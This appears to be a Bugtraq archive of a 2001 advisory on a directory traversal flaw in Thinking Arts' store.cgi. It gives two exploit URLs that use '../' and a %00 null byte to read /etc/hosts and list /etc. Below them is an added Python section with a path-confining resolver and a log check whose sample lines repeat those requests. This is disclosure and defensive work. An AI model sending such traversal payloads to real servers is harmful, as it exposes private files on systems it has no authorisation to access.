Bugtraq mailing list archives

Thinking Arts Store.cgi Directory Traversal


From: slipy () B10Z NET
Date: Fri, 16 Feb 2001 07:14:01 -0000

Introduction:

Thinking Arts LTD's E-Commerce package ships with a
web store front end called store.cgi, which lets
customers order products on the site, backed by a
SQL database.


The vendor's website is:
http://www.thinkingarts.com/  


Problem: Simple Directory Traversal

Adding the string "/../" to a URL allows an attacker to
view any file on the server, and also to list directories
on the server, that the account the vulnerable httpd
runs as has permission to read. Remote execution of
commands does not appear to be possible with this
directory traversal bug, but directory listings are.
Please note that you do need the %00.html at the end of
the request: the %00 is a URL-encoded null byte, which
terminates the file name when the script opens it, so
the trailing .html is seen by the script but never
reaches the filesystem.


Examples:

http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
^^ = Returns the contents of /etc/hosts.

http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html
^^ = Returns a listing of the /etc/ directory.
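As an added illustration (not code from the advisory, from the poster, or from Thinking Arts), a Python sketch of the two controls a defender wants for this bug: a StartID resolver that refuses the null byte and confines the canonicalised path to the document root, and a web-log check that flags the request pattern shown above. DOC_ROOT and the sample log lines are assumed and constructed; the original store.cgi's internals are not known beyond what the advisory states.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed directory of the .html fragments store.cgi serves (not from the advisory).
DOC_ROOT = "/var/www/store/pages"

def resolve_start_id(start_id, root=DOC_ROOT):
    """Return the file a StartID value may open, or None to reject the request.
    The advisory shows a NUL (%00) letting "../etc/hosts" reach open() while the
    script still saw a name ending in .html; here NUL is refused, then the path
    is canonicalised and checked to still lie under root."""
    if "\x00" in start_id:                      # NUL would truncate the path at open()
        return None
    if not re.fullmatch(r"[A-Za-z0-9_./-]{1,64}", start_id):
        return None                             # a tighter whitelist (no . or /) is better still
    root_real = os.path.realpath(root)
    # String concatenation, not os.path.join: join() discards root if start_id is absolute.
    candidate = os.path.realpath(root_real + "/" + start_id + ".html")
    if os.path.commonpath([candidate, root_real]) != root_real:
        return None                             # "../" escaped the document root
    return candidate

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_traversal_attempt(log_line):
    """True for a Common Log Format line whose store.cgi StartID carries a NUL
    byte or a '..' path element, the two markers in the advisory's examples."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if not url.path.endswith("/store.cgi"):
        return False
    for value in parse_qs(url.query, keep_blank_values=True).get("StartID", []):
        decoded = unquote(value)                # parse_qs decoded once; again catches %2500
        if "\x00" in decoded or ".." in decoded.replace("\\", "/").split("/"):
            return True
    return False

# Constructed sample log lines (not real traffic); the first two mirror the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2001:07:14:01 +0000] "GET /cgi-bin/store.cgi?StartID=../etc/hosts%00.html HTTP/1.0" 200 512',
    '10.0.0.5 - - [16/Feb/2001:07:14:30 +0000] "GET /cgi-bin/store.cgi?StartID=../etc/%00.html HTTP/1.0" 200 4096',
    '10.0.0.6 - - [16/Feb/2001:07:15:22 +0000] "GET /cgi-bin/store.cgi?StartID=welcome HTTP/1.0" 200 2048',
]

def flagged_lines(lines=SAMPLE_LOG):
    return [line for line in lines if is_traversal_attempt(line)]
```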



Solution:

The vendor has been contacted. No reply from them yet,
and seeing as only 3 sites that signed up for their dumb
service are affected, it doesn't really matter now,
does it?


--------------------
b10z cgi advisory.
slipy () b10z net

February 16th, 2001.

